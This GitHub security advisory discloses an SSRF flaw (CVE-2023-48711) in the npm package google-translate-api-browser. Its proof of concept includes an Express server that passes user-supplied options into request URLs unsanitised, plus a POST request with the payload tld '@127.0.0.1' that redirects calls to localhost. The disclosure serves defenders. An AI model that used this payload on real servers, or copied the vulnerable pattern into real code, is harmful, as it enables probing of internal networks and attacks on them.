Skip to content

Server-Side Request Forgery (SSRF) Vulnerability

Low
cjvnjde published GHSA-4233-7q5q-m7p6 Nov 23, 2023

Package

npm google-translate-api-browser (npm)

Affected versions

<4.1.0

Patched versions

None

Description

Summary

A Server-Side Request Forgery (SSRF) Vulnerability is present in applications utilizing the google-translate-api-browser package and exposing the translateOptions to the end user. An attacker can set a malicious tld, causing the application to return unsafe URLs pointing towards local resources.

Details

The translateOptions.tld field is not properly sanitized before being placed in the Google translate URL. This can allow an attacker with control over the translateOptions to set the tld to a payload such as @127.0.0.1. This causes the full URL to become https://[email protected]/..., where translate.google. is the username used to connect to localhost.

PoC

Imagine a server running the following code (closely mimicking the code present in the package's README):

const express = require('express');
const { generateRequestUrl, normaliseResponse } = require('google-translate-api-browser');
const https = require('https');

const app = express();
app.use(express.json());

app.post('/translate', async (req, res) => {
    const { text, options } = req.body;

    const url = generateRequestUrl(text, options);

    https.get(url, (resp) => {
        let data = '';
      
        resp.on('data', (chunk) => {
          data += chunk;
        });
      
        resp.on('end', () => {
            res.json(normaliseResponse(JSON.parse(data)));
        });
      }).on("error", (err) => {
        console.log("Error: " + err.message);
      });
});

const port = 3000;
app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});

An attacker can then send the following POST request to /translate:

POST /translate HTTP/1.1
Host: localhost:3000
Content-Type: application/json
Content-Length: 51

{"text":"Hello","options": {"tld": "@127.0.0.1"}  }

This will cause a request to be sent to the localhost of the server running the Node application.

Impact

An attacker can send requests within internal networks and the local host. Should any HTTPS application be present on the internal network with a vulnerability exploitable via a GET call, then it would be possible to exploit this using this vulnerability.

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

CVE ID

CVE-2023-48711

Credits